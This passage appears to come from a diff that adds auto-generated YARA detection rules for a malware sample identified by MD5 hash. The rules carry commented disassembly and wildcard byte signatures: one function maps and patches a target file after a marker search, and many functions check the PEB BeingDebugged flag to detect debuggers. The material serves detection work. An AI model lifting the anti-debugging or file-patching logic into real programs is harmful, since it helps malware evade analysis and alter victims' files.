8b4de0 mov ecx,dword [ebp - 32] + .text:0x0040121b 33d2 xor edx,edx + .text:0x0040121d 
8a9131904000 mov dl,byte [ecx + 0x00409031] + .text:0x00401223 83fa56 cmp edx,86 + .text:0x00401226 754f jnz 0x00401277 + .text:0x00401228 8b45e0 mov eax,dword [ebp - 32] + .text:0x0040122b 33c9 xor ecx,ecx + .text:0x0040122d 8a8832904000 mov cl,byte [eax + 0x00409032] + .text:0x00401233 83f934 cmp ecx,52 + .text:0x00401236 753f jnz 0x00401277 + .text:0x00401238 8b55e0 mov edx,dword [ebp - 32] + .text:0x0040123b 33c0 xor eax,eax + .text:0x0040123d 8a8233904000 mov al,byte [edx + 0x00409033] + .text:0x00401243 83f812 cmp eax,18 + .text:0x00401246 752f jnz 0x00401277 + .text:0x00401248 8b4ddc mov ecx,dword [ebp - 36] + .text:0x0040124b 8b5128 mov edx,dword [ecx + 40] + .text:0x0040124e 8b45ec mov eax,dword [ebp - 20] + .text:0x00401251 035014 add edx,dword [eax + 20] + .text:0x00401254 8b4ddc mov ecx,dword [ebp - 36] + .text:0x00401257 2b512c sub edx,dword [ecx + 44] + .text:0x0040125a 8b45e0 mov eax,dword [ebp - 32] + .text:0x0040125d 8b4dd8 mov ecx,dword [ebp - 40] + .text:0x00401260 8d440104 lea eax,dword [ecx + eax + 4] + .text:0x00401264 2bd0 sub edx,eax + .text:0x00401266 8955d0 mov dword [ebp - 48],edx + .text:0x00401269 8b4de0 mov ecx,dword [ebp - 32] + .text:0x0040126c 8b55d0 mov edx,dword [ebp - 48] + .text:0x0040126f 899130904000 mov dword [ecx + 0x00409030],edx + .text:0x00401275 eb05 jmp 0x0040127c + .text:0x00401277 loc_00401277: [4 XREFS] + .text:0x00401277 e97affffff jmp 0x004011f6 + .text:0x0040127c loc_0040127c: [2 XREFS] + .text:0x0040127c 8b7dfc mov edi,dword [ebp - 4] + .text:0x0040127f 037dd8 add edi,dword [ebp - 40] + .text:0x00401282 b94e000000 mov ecx,78 + .text:0x00401287 be30904000 mov esi,0x00409030 + .text:0x0040128c f3a5 rep: movsd + .text:0x0040128e 66a5 movsd + .text:0x00401290 8b45ec mov eax,dword [ebp - 20] + .text:0x00401293 8b4dd8 mov ecx,dword [ebp - 40] + .text:0x00401296 2b4814 sub ecx,dword [eax + 20] + .text:0x00401299 8b55dc mov edx,dword [ebp - 36] + .text:0x0040129c 034a2c add ecx,dword [edx + 44] + .text:0x0040129f 8b45dc 
mov eax,dword [ebp - 36] + .text:0x004012a2 894828 mov dword [eax + 40],ecx + .text:0x004012a5 8b4dd4 mov ecx,dword [ebp - 44] + .text:0x004012a8 51 push ecx + .text:0x004012a9 ff150c804000 call dword [0x0040800c] ;kernel32.CloseHandle(<0x00401095>) + .text:0x004012af 8b55f4 mov edx,dword [ebp - 12] + .text:0x004012b2 52 push edx + .text:0x004012b3 ff150c804000 call dword [0x0040800c] ;kernel32.CloseHandle(<0x004010cb>) + .text:0x004012b9 8b45fc mov eax,dword [ebp - 4] + .text:0x004012bc 50 push eax + .text:0x004012bd ff1504804000 call dword [0x00408004] ;kernel32.UnmapViewOfFile(kernel32.MapViewOfFile(<0x004010cb>,6,0,0,<0x004010b2>)) + .text:0x004012c3 33c0 xor eax,eax + .text:0x004012c5 loc_004012c5: [7 XREFS] + .text:0x004012c5 5f pop edi + .text:0x004012c6 5e pop esi + .text:0x004012c7 8be5 mov esp,ebp + .text:0x004012c9 5d pop ebp + .text:0x004012ca c3 ret + */ + $c1 = { 55 8B EC 83 EC 30 56 57 C7 45 ?? 00 00 00 00 6A 00 68 80 00 00 00 6A 04 6A 00 6A 01 68 00 00 00 C0 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? FF 75 ?? 83 C8 FF E9 ?? ?? ?? ?? 6A 00 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 45 ?? 6A 00 8B 55 ?? 52 6A 00 6A 04 6A 00 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? FF 75 ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 83 C8 FF E9 ?? ?? ?? ?? 8B 55 ?? 52 6A 00 6A 00 6A 06 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? 00 75 ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 83 C8 FF E9 ?? ?? ?? ?? 8B 4D ?? 89 4D ?? 8B 55 ?? 8B 45 ?? 03 42 ?? 89 45 ?? 8B 4D ?? 33 D2 66 8B 51 ?? 8B 45 ?? 8D 4C 10 ?? 89 4D ?? 8B 55 ?? 33 C0 66 8B 42 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 08 89 45 ?? 83 7D ?? 00 75 ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 83 C8 FF E9 ?? ?? ?? ?? 8B 55 ?? 83 7A ?? 00 75 ?? 83 C8 FF E9 ?? ?? ?? ?? 8B 45 ?? 81 78 ?? 3A 01 00 00 77 ?? 83 C8 FF E9 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? 8B 41 ?? 2B 42 ?? 89 45 ?? 81 7D ?? 3A 01 00 00 73 ?? 83 C8 FF E9 ?? ?? ?? ?? 8B 4D ?? 
8B 51 ?? 8B 45 ?? 03 50 ?? 89 55 ?? C7 45 ?? 00 00 00 00 EB ?? 8B 4D ?? 83 C1 01 89 4D ?? 81 7D ?? 3A 01 00 00 73 ?? 8B 55 ?? 33 C0 8A 82 ?? ?? ?? ?? 83 F8 78 75 ?? 8B 4D ?? 33 D2 8A 91 ?? ?? ?? ?? 83 FA 56 75 ?? 8B 45 ?? 33 C9 8A 88 ?? ?? ?? ?? 83 F9 34 75 ?? 8B 55 ?? 33 C0 8A 82 ?? ?? ?? ?? 83 F8 12 75 ?? 8B 4D ?? 8B 51 ?? 8B 45 ?? 03 50 ?? 8B 4D ?? 2B 51 ?? 8B 45 ?? 8B 4D ?? 8D 44 01 ?? 2B D0 89 55 ?? 8B 4D ?? 8B 55 ?? 89 91 ?? ?? ?? ?? EB ?? E9 ?? ?? ?? ?? 8B 7D ?? 03 7D ?? B9 4E 00 00 00 BE 30 90 40 00 F3 A5 66 A5 8B 45 ?? 8B 4D ?? 2B 48 ?? 8B 55 ?? 03 4A ?? 8B 45 ?? 89 48 ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 33 C0 5F 5E 8B E5 5D C3 } + condition: + all of them +} + +rule super_rule_7faaf +{ + meta: + author = "CAPA Matches" + date_created = "2023-08-10" + date_modified = "2023-08-10" + description = "" + md5 = "7faafc7e4a5c736ebfee6abbbc812d80" + strings: + /* +Basic Block at 0x00401100@7faafc7e4a5c736ebfee6abbbc812d80 with 1 features: + - check for PEB BeingDebugged flag + .text:0x00401100 + .text:0x00401100 FUNC: int cdecl sub_00401100( ) [2 XREFS] + .text:0x00401100 + .text:0x00401100 Stack Variables: (offset from initial top of stack) + .text:0x00401100 -8: int local8 + .text:0x00401100 -12: int local12 + .text:0x00401100 -16: int local16 + .text:0x00401100 -20: int local20 + .text:0x00401100 -24: int local24 + .text:0x00401100 + .text:0x00401100 55 push ebp + .text:0x00401101 8bec mov ebp,esp + .text:0x00401103 83ec14 sub esp,20 + .text:0x00401106 53 push ebx + .text:0x00401107 56 push esi + .text:0x00401108 57 push edi + .text:0x00401109 c745f000000000 mov dword [ebp - 16],0 + .text:0x00401110 c745ec00000000 mov dword [ebp - 20],0 + .text:0x00401117 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x0040111d 8a5802 mov bl,byte [eax + 2] + .text:0x00401120 885df4 mov byte [ebp - 12],bl + .text:0x00401123 0fbe45f4 movsx eax,byte [ebp - 12] + .text:0x00401127 85c0 test eax,eax + .text:0x00401129 
7405 jz 0x00401130 + */ + $c2 = { 55 8B EC 83 EC 14 53 56 57 C7 45 ?? 00 00 00 00 C7 45 ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 5D ?? 0F BE 45 ?? 85 C0 74 ?? } + /* +Basic Block at 0x004011d0@7faafc7e4a5c736ebfee6abbbc812d80 with 1 features: + - check for PEB BeingDebugged flag + .text:0x004011d0 + .text:0x004011d0 FUNC: int cdecl sub_004011d0( int arg0, int arg1, int arg2, int arg3, ) [6 XREFS] + .text:0x004011d0 + .text:0x004011d0 Stack Variables: (offset from initial top of stack) + .text:0x004011d0 16: int arg3 + .text:0x004011d0 12: int arg2 + .text:0x004011d0 8: int arg1 + .text:0x004011d0 4: int arg0 + .text:0x004011d0 -8: int local8 + .text:0x004011d0 -4108: int local4108 + .text:0x004011d0 -4112: int local4112 + .text:0x004011d0 -4116: int local4116 + .text:0x004011d0 -4120: int local4120 + .text:0x004011d0 -4124: int local4124 + .text:0x004011d0 + .text:0x004011d0 55 push ebp + .text:0x004011d1 8bec mov ebp,esp + .text:0x004011d3 b818100000 mov eax,0x00001018 + .text:0x004011d8 e893270000 call 0x00403970 ;__alloca_probe() + .text:0x004011dd 53 push ebx + .text:0x004011de 56 push esi + .text:0x004011df 57 push edi + .text:0x004011e0 c785ecefffff0000 mov dword [ebp - 4116],0 + .text:0x004011ea c785e8efffff0000 mov dword [ebp - 4120],0 + .text:0x004011f4 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x004011fa 8a5802 mov bl,byte [eax + 2] + .text:0x004011fd 889df0efffff mov byte [ebp - 4112],bl + .text:0x00401203 0fbe85f0efffff movsx eax,byte [ebp - 4112] + .text:0x0040120a 85c0 test eax,eax + .text:0x0040120c 7405 jz 0x00401213 + */ + $c3 = { 55 8B EC B8 18 10 00 00 E8 ?? ?? ?? ?? 53 56 57 C7 85 ?? ?? ?? ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 9D ?? ?? ?? ?? 0F BE 85 ?? ?? ?? ?? 85 C0 74 ?? 
} + /* +Basic Block at 0x004014b0@7faafc7e4a5c736ebfee6abbbc812d80 with 1 features: + - check for PEB BeingDebugged flag + .text:0x004014b0 + .text:0x004014b0 FUNC: int cdecl sub_004014b0( int arg0, int arg1, int arg2, int arg3, int arg4, int arg5, int arg6, ) [8 XREFS] + .text:0x004014b0 + .text:0x004014b0 Stack Variables: (offset from initial top of stack) + .text:0x004014b0 28: int arg6 + .text:0x004014b0 24: int arg5 + .text:0x004014b0 20: int arg4 + .text:0x004014b0 16: int arg3 + .text:0x004014b0 12: int arg2 + .text:0x004014b0 8: int arg1 + .text:0x004014b0 4: int arg0 + .text:0x004014b0 -8: int local8 + .text:0x004014b0 -12: int local12 + .text:0x004014b0 -4108: int local4108 + .text:0x004014b0 -4112: int local4112 + .text:0x004014b0 -4116: int local4116 + .text:0x004014b0 -4120: int local4120 + .text:0x004014b0 -4124: int local4124 + .text:0x004014b0 -4128: int local4128 + .text:0x004014b0 + .text:0x004014b0 55 push ebp + .text:0x004014b1 8bec mov ebp,esp + .text:0x004014b3 b81c100000 mov eax,0x0000101c + .text:0x004014b8 e8b3240000 call 0x00403970 ;__alloca_probe() + .text:0x004014bd 53 push ebx + .text:0x004014be 56 push esi + .text:0x004014bf 57 push edi + .text:0x004014c0 c785e8efffff0000 mov dword [ebp - 4120],0 + .text:0x004014ca c785e4efffff0000 mov dword [ebp - 4124],0 + .text:0x004014d4 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x004014da 8a5802 mov bl,byte [eax + 2] + .text:0x004014dd 889decefffff mov byte [ebp - 4116],bl + .text:0x004014e3 0fbe85ecefffff movsx eax,byte [ebp - 4116] + .text:0x004014ea 85c0 test eax,eax + .text:0x004014ec 7405 jz 0x004014f3 + */ + $c4 = { 55 8B EC B8 1C 10 00 00 E8 ?? ?? ?? ?? 53 56 57 C7 85 ?? ?? ?? ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 9D ?? ?? ?? ?? 0F BE 85 ?? ?? ?? ?? 85 C0 74 ?? 
} + /* +Basic Block at 0x004016c0@7faafc7e4a5c736ebfee6abbbc812d80 with 1 features: + - check for PEB BeingDebugged flag + .text:0x004016c0 + .text:0x004016c0 FUNC: int cdecl sub_004016c0( int arg0, int arg1, ) [2 XREFS] + .text:0x004016c0 + .text:0x004016c0 Stack Variables: (offset from initial top of stack) + .text:0x004016c0 8: int arg1 + .text:0x004016c0 4: int arg0 + .text:0x004016c0 -1028: int local1028 + .text:0x004016c0 -2052: int local2052 + .text:0x004016c0 -3076: int local3076 + .text:0x004016c0 -3080: int local3080 + .text:0x004016c0 -3084: int local3084 + .text:0x004016c0 -3088: int local3088 + .text:0x004016c0 + .text:0x004016c0 55 push ebp + .text:0x004016c1 8bec mov ebp,esp + .text:0x004016c3 81ec0c0c0000 sub esp,3084 + .text:0x004016c9 53 push ebx + .text:0x004016ca 56 push esi + .text:0x004016cb 57 push edi + .text:0x004016cc c785f8f3ffff0000 mov dword [ebp - 3080],0 + .text:0x004016d6 c785f4f3ffff0000 mov dword [ebp - 3084],0 + .text:0x004016e0 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x004016e6 8a5802 mov bl,byte [eax + 2] + .text:0x004016e9 889dfcf3ffff mov byte [ebp - 3076],bl + .text:0x004016ef 0fbe85fcf3ffff movsx eax,byte [ebp - 3076] + .text:0x004016f6 85c0 test eax,eax + .text:0x004016f8 7405 jz 0x004016ff + */ + $c5 = { 55 8B EC 81 EC 0C 0C 00 00 53 56 57 C7 85 ?? ?? ?? ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 9D ?? ?? ?? ?? 0F BE 85 ?? ?? ?? ?? 85 C0 74 ?? 
} + /* +Basic Block at 0x00401790@7faafc7e4a5c736ebfee6abbbc812d80 with 1 features: + - check for PEB BeingDebugged flag + .text:0x00401790 + .text:0x00401790 FUNC: int cdecl sub_00401790( int arg0, ) [2 XREFS] + .text:0x00401790 + .text:0x00401790 Stack Variables: (offset from initial top of stack) + .text:0x00401790 4: int arg0 + .text:0x00401790 -1028: int local1028 + .text:0x00401790 -2052: int local2052 + .text:0x00401790 -3076: int local3076 + .text:0x00401790 -4100: int local4100 + .text:0x00401790 -4104: int local4104 + .text:0x00401790 -4108: int local4108 + .text:0x00401790 -4112: int local4112 + .text:0x00401790 + .text:0x00401790 55 push ebp + .text:0x00401791 8bec mov ebp,esp + .text:0x00401793 b80c100000 mov eax,0x0000100c + .text:0x00401798 e8d3210000 call 0x00403970 ;__alloca_probe() + .text:0x0040179d 53 push ebx + .text:0x0040179e 56 push esi + .text:0x0040179f 57 push edi + .text:0x004017a0 c785f8efffff0000 mov dword [ebp - 4104],0 + .text:0x004017aa c785f4efffff0000 mov dword [ebp - 4108],0 + .text:0x004017b4 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x004017ba 8a5802 mov bl,byte [eax + 2] + .text:0x004017bd 889dfcefffff mov byte [ebp - 4100],bl + .text:0x004017c3 0fbe85fcefffff movsx eax,byte [ebp - 4100] + .text:0x004017ca 85c0 test eax,eax + .text:0x004017cc 7405 jz 0x004017d3 + */ + $c6 = { 55 8B EC B8 0C 10 00 00 E8 ?? ?? ?? ?? 53 56 57 C7 85 ?? ?? ?? ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 9D ?? ?? ?? ?? 0F BE 85 ?? ?? ?? ?? 85 C0 74 ?? 
} + /* +Basic Block at 0x00401880@7faafc7e4a5c736ebfee6abbbc812d80 with 1 features: + - check for PEB BeingDebugged flag + .text:0x00401880 + .text:0x00401880 FUNC: int cdecl sub_00401880( int arg0, int arg1, ) [2 XREFS] + .text:0x00401880 + .text:0x00401880 Stack Variables: (offset from initial top of stack) + .text:0x00401880 8: int arg1 + .text:0x00401880 4: int arg0 + .text:0x00401880 -12: int local12 + .text:0x00401880 -20: int local20 + .text:0x00401880 -28: int local28 + .text:0x00401880 -32: int local32 + .text:0x00401880 -36: int local36 + .text:0x00401880 -40: int local40 + .text:0x00401880 -44: int local44 + .text:0x00401880 + .text:0x00401880 55 push ebp + .text:0x00401881 8bec mov ebp,esp + .text:0x00401883 83ec28 sub esp,40 + .text:0x00401886 53 push ebx + .text:0x00401887 56 push esi + .text:0x00401888 57 push edi + .text:0x00401889 c745dc00000000 mov dword [ebp - 36],0 + .text:0x00401890 c745d800000000 mov dword [ebp - 40],0 + .text:0x00401897 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x0040189d 8a5802 mov bl,byte [eax + 2] + .text:0x004018a0 885de0 mov byte [ebp - 32],bl + .text:0x004018a3 0fbe45e0 movsx eax,byte [ebp - 32] + .text:0x004018a7 85c0 test eax,eax + .text:0x004018a9 7405 jz 0x004018b0 + */ + $c7 = { 55 8B EC 83 EC 28 53 56 57 C7 45 ?? 00 00 00 00 C7 45 ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 5D ?? 0F BE 45 ?? 85 C0 74 ?? 
} + /* +Basic Block at 0x004019b0@7faafc7e4a5c736ebfee6abbbc812d80 with 1 features: + - check for PEB BeingDebugged flag + .text:0x004019b0 + .text:0x004019b0 FUNC: int cdecl sub_004019b0( int arg0, ) [4 XREFS] + .text:0x004019b0 + .text:0x004019b0 Stack Variables: (offset from initial top of stack) + .text:0x004019b0 4: int arg0 + .text:0x004019b0 -1028: int local1028 + .text:0x004019b0 -1032: int local1032 + .text:0x004019b0 -1036: int local1036 + .text:0x004019b0 -1040: int local1040 + .text:0x004019b0 + .text:0x004019b0 55 push ebp + .text:0x004019b1 8bec mov ebp,esp + .text:0x004019b3 81ec0c040000 sub esp,1036 + .text:0x004019b9 53 push ebx + .text:0x004019ba 56 push esi + .text:0x004019bb 57 push edi + .text:0x004019bc c785f8fbffff0000 mov dword [ebp - 1032],0 + .text:0x004019c6 c785f4fbffff0000 mov dword [ebp - 1036],0 + .text:0x004019d0 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x004019d6 8a5802 mov bl,byte [eax + 2] + .text:0x004019d9 889dfcfbffff mov byte [ebp - 1028],bl + .text:0x004019df 0fbe85fcfbffff movsx eax,byte [ebp - 1028] + .text:0x004019e6 85c0 test eax,eax + .text:0x004019e8 7405 jz 0x004019ef + */ + $c8 = { 55 8B EC 81 EC 0C 04 00 00 53 56 57 C7 85 ?? ?? ?? ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 9D ?? ?? ?? ?? 0F BE 85 ?? ?? ?? ?? 85 C0 74 ?? 
} + /* +Basic Block at 0x00401ab0@7faafc7e4a5c736ebfee6abbbc812d80 with 1 features: + - check for PEB BeingDebugged flag + .text:0x00401ab0 + .text:0x00401ab0 FUNC: int cdecl sub_00401ab0( int arg0, int arg1, int arg2, ) [8 XREFS] + .text:0x00401ab0 + .text:0x00401ab0 Stack Variables: (offset from initial top of stack) + .text:0x00401ab0 12: int arg2 + .text:0x00401ab0 8: int arg1 + .text:0x00401ab0 4: int arg0 + .text:0x00401ab0 -404: int local404 + .text:0x00401ab0 -408: int local408 + .text:0x00401ab0 -420: int local420 + .text:0x00401ab0 -422: int local422 + .text:0x00401ab0 -424: int local424 + .text:0x00401ab0 -428: int local428 + .text:0x00401ab0 -432: int local432 + .text:0x00401ab0 -436: int local436 + .text:0x00401ab0 + .text:0x00401ab0 55 push ebp + .text:0x00401ab1 8bec mov ebp,esp + .text:0x00401ab3 81ecb0010000 sub esp,432 + .text:0x00401ab9 53 push ebx + .text:0x00401aba 56 push esi + .text:0x00401abb 57 push edi + .text:0x00401abc c78554feffff0000 mov dword [ebp - 428],0 + .text:0x00401ac6 c78550feffff0000 mov dword [ebp - 432],0 + .text:0x00401ad0 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00401ad6 8a5802 mov bl,byte [eax + 2] + .text:0x00401ad9 889d58feffff mov byte [ebp - 424],bl + .text:0x00401adf 0fbe8558feffff movsx eax,byte [ebp - 424] + .text:0x00401ae6 85c0 test eax,eax + .text:0x00401ae8 7405 jz 0x00401aef + */ + $c9 = { 55 8B EC 81 EC B0 01 00 00 53 56 57 C7 85 ?? ?? ?? ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 9D ?? ?? ?? ?? 0F BE 85 ?? ?? ?? ?? 85 C0 74 ?? 
} + /* +Basic Block at 0x00401c20@7faafc7e4a5c736ebfee6abbbc812d80 with 1 features: + - check for PEB BeingDebugged flag + .text:0x00401c20 + .text:0x00401c20 FUNC: int cdecl sub_00401c20( int arg0, ) [24 XREFS] + .text:0x00401c20 + .text:0x00401c20 Stack Variables: (offset from initial top of stack) + .text:0x00401c20 4: int arg0 + .text:0x00401c20 -8: int local8 + .text:0x00401c20 -12: int local12 + .text:0x00401c20 -16: int local16 + .text:0x00401c20 + .text:0x00401c20 55 push ebp + .text:0x00401c21 8bec mov ebp,esp + .text:0x00401c23 83ec0c sub esp,12 + .text:0x00401c26 53 push ebx + .text:0x00401c27 56 push esi + .text:0x00401c28 57 push edi + .text:0x00401c29 c745f800000000 mov dword [ebp - 8],0 + .text:0x00401c30 c745f400000000 mov dword [ebp - 12],0 + .text:0x00401c37 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00401c3d 8a5802 mov bl,byte [eax + 2] + .text:0x00401c40 885dfc mov byte [ebp - 4],bl + .text:0x00401c43 0fbe45fc movsx eax,byte [ebp - 4] + .text:0x00401c47 85c0 test eax,eax + .text:0x00401c49 7405 jz 0x00401c50 + */ + $c10 = { 55 8B EC 83 EC 0C 53 56 57 C7 45 ?? 00 00 00 00 C7 45 ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 5D ?? 0F BE 45 ?? 85 C0 74 ?? 
} + /* +Basic Block at 0x00401cd0@7faafc7e4a5c736ebfee6abbbc812d80 with 1 features: + - check for PEB BeingDebugged flag + .text:0x00401cd0 + .text:0x00401cd0 FUNC: int cdecl sub_00401cd0( int arg0, int arg1, int arg2, ) [2 XREFS] + .text:0x00401cd0 + .text:0x00401cd0 Stack Variables: (offset from initial top of stack) + .text:0x00401cd0 12: int arg2 + .text:0x00401cd0 8: int arg1 + .text:0x00401cd0 4: int arg0 + .text:0x00401cd0 -8: int local8 + .text:0x00401cd0 -12: int local12 + .text:0x00401cd0 -524: int local524 + .text:0x00401cd0 -528: int local528 + .text:0x00401cd0 -532: int local532 + .text:0x00401cd0 -536: int local536 + .text:0x00401cd0 -540: int local540 + .text:0x00401cd0 -544: int local544 + .text:0x00401cd0 + .text:0x00401cd0 55 push ebp + .text:0x00401cd1 8bec mov ebp,esp + .text:0x00401cd3 81ec1c020000 sub esp,540 + .text:0x00401cd9 53 push ebx + .text:0x00401cda 56 push esi + .text:0x00401cdb 57 push edi + .text:0x00401cdc c745fc00000000 mov dword [ebp - 4],0 + .text:0x00401ce3 c785e8fdffff0000 mov dword [ebp - 536],0 + .text:0x00401ced c785e4fdffff0000 mov dword [ebp - 540],0 + .text:0x00401cf7 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00401cfd 8a5802 mov bl,byte [eax + 2] + .text:0x00401d00 889decfdffff mov byte [ebp - 532],bl + .text:0x00401d06 0fbe85ecfdffff movsx eax,byte [ebp - 532] + .text:0x00401d0d 85c0 test eax,eax + .text:0x00401d0f 7405 jz 0x00401d16 + */ + $c11 = { 55 8B EC 81 EC 1C 02 00 00 53 56 57 C7 45 ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 9D ?? ?? ?? ?? 0F BE 85 ?? ?? ?? ?? 85 C0 74 ?? 
} + /* +Basic Block at 0x00401e30@7faafc7e4a5c736ebfee6abbbc812d80 with 1 features: + - check for PEB BeingDebugged flag + .text:0x00401e30 + .text:0x00401e30 FUNC: int cdecl sub_00401e30( int arg0, int arg1, int arg2, ) [2 XREFS] + .text:0x00401e30 + .text:0x00401e30 Stack Variables: (offset from initial top of stack) + .text:0x00401e30 12: int arg2 + .text:0x00401e30 8: int arg1 + .text:0x00401e30 4: int arg0 + .text:0x00401e30 -8: int local8 + .text:0x00401e30 -12: int local12 + .text:0x00401e30 -524: int local524 + .text:0x00401e30 -528: int local528 + .text:0x00401e30 -532: int local532 + .text:0x00401e30 -536: int local536 + .text:0x00401e30 -540: int local540 + .text:0x00401e30 -544: int local544 + .text:0x00401e30 -548: int local548 + .text:0x00401e30 + .text:0x00401e30 55 push ebp + .text:0x00401e31 8bec mov ebp,esp + .text:0x00401e33 81ec20020000 sub esp,544 + .text:0x00401e39 53 push ebx + .text:0x00401e3a 56 push esi + .text:0x00401e3b 57 push edi + .text:0x00401e3c c745fc00000000 mov dword [ebp - 4],0 + .text:0x00401e43 c785e4fdffff0000 mov dword [ebp - 540],0 + .text:0x00401e4d c785e0fdffff0000 mov dword [ebp - 544],0 + .text:0x00401e57 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00401e5d 8a5802 mov bl,byte [eax + 2] + .text:0x00401e60 889de8fdffff mov byte [ebp - 536],bl + .text:0x00401e66 0fbe85e8fdffff movsx eax,byte [ebp - 536] + .text:0x00401e6d 85c0 test eax,eax + .text:0x00401e6f 7405 jz 0x00401e76 + */ + $c12 = { 55 8B EC 81 EC 20 02 00 00 53 56 57 C7 45 ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 9D ?? ?? ?? ?? 0F BE 85 ?? ?? ?? ?? 85 C0 74 ?? 
} + /* +Basic Block at 0x00402020@7faafc7e4a5c736ebfee6abbbc812d80 with 1 features: + - check for PEB BeingDebugged flag + .text:0x00402020 + .text:0x00402020 FUNC: int cdecl sub_00402020( int arg0, int arg1, int arg2, ) [2 XREFS] + .text:0x00402020 + .text:0x00402020 Stack Variables: (offset from initial top of stack) + .text:0x00402020 12: int arg2 + .text:0x00402020 8: int arg1 + .text:0x00402020 4: int arg0 + .text:0x00402020 -8: int local8 + .text:0x00402020 -12: int local12 + .text:0x00402020 -524: int local524 + .text:0x00402020 -528: int local528 + .text:0x00402020 -532: int local532 + .text:0x00402020 -536: int local536 + .text:0x00402020 -540: int local540 + .text:0x00402020 + .text:0x00402020 55 push ebp + .text:0x00402021 8bec mov ebp,esp + .text:0x00402023 81ec18020000 sub esp,536 + .text:0x00402029 53 push ebx + .text:0x0040202a 56 push esi + .text:0x0040202b 57 push edi + .text:0x0040202c c745f800000000 mov dword [ebp - 8],0 + .text:0x00402033 c785ecfdffff0000 mov dword [ebp - 532],0 + .text:0x0040203d c785e8fdffff0000 mov dword [ebp - 536],0 + .text:0x00402047 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x0040204d 8a5802 mov bl,byte [eax + 2] + .text:0x00402050 889df0fdffff mov byte [ebp - 528],bl + .text:0x00402056 0fbe85f0fdffff movsx eax,byte [ebp - 528] + .text:0x0040205d 85c0 test eax,eax + .text:0x0040205f 7405 jz 0x00402066 + */ + $c13 = { 55 8B EC 81 EC 18 02 00 00 53 56 57 C7 45 ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 9D ?? ?? ?? ?? 0F BE 85 ?? ?? ?? ?? 85 C0 74 ?? 
} + /* +Basic Block at 0x004021b0@7faafc7e4a5c736ebfee6abbbc812d80 with 1 features: + - check for PEB BeingDebugged flag + .text:0x004021b0 + .text:0x004021b0 FUNC: int cdecl sub_004021b0( int arg0, int arg1, int arg2, int arg3, int arg4, ) [2 XREFS] + .text:0x004021b0 + .text:0x004021b0 Stack Variables: (offset from initial top of stack) + .text:0x004021b0 20: int arg4 + .text:0x004021b0 16: int arg3 + .text:0x004021b0 12: int arg2 + .text:0x004021b0 8: int arg1 + .text:0x004021b0 4: int arg0 + .text:0x004021b0 -8: int local8 + .text:0x004021b0 -1032: int local1032 + .text:0x004021b0 -1036: int local1036 + .text:0x004021b0 -1040: int local1040 + .text:0x004021b0 -1552: int local1552 + .text:0x004021b0 -1556: int local1556 + .text:0x004021b0 -1560: int local1560 + .text:0x004021b0 -1564: int local1564 + .text:0x004021b0 -1568: int local1568 + .text:0x004021b0 + .text:0x004021b0 55 push ebp + .text:0x004021b1 8bec mov ebp,esp + .text:0x004021b3 81ec1c060000 sub esp,1564 + .text:0x004021b9 53 push ebx + .text:0x004021ba 56 push esi + .text:0x004021bb 57 push edi + .text:0x004021bc c785f4fbffff0000 mov dword [ebp - 1036],0 + .text:0x004021c6 c785f8fbffff0000 mov dword [ebp - 1032],0 + .text:0x004021d0 c785e8f9ffff0000 mov dword [ebp - 1560],0 + .text:0x004021da c785e4f9ffff0000 mov dword [ebp - 1564],0 + .text:0x004021e4 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x004021ea 8a5802 mov bl,byte [eax + 2] + .text:0x004021ed 889decf9ffff mov byte [ebp - 1556],bl + .text:0x004021f3 0fbe85ecf9ffff movsx eax,byte [ebp - 1556] + 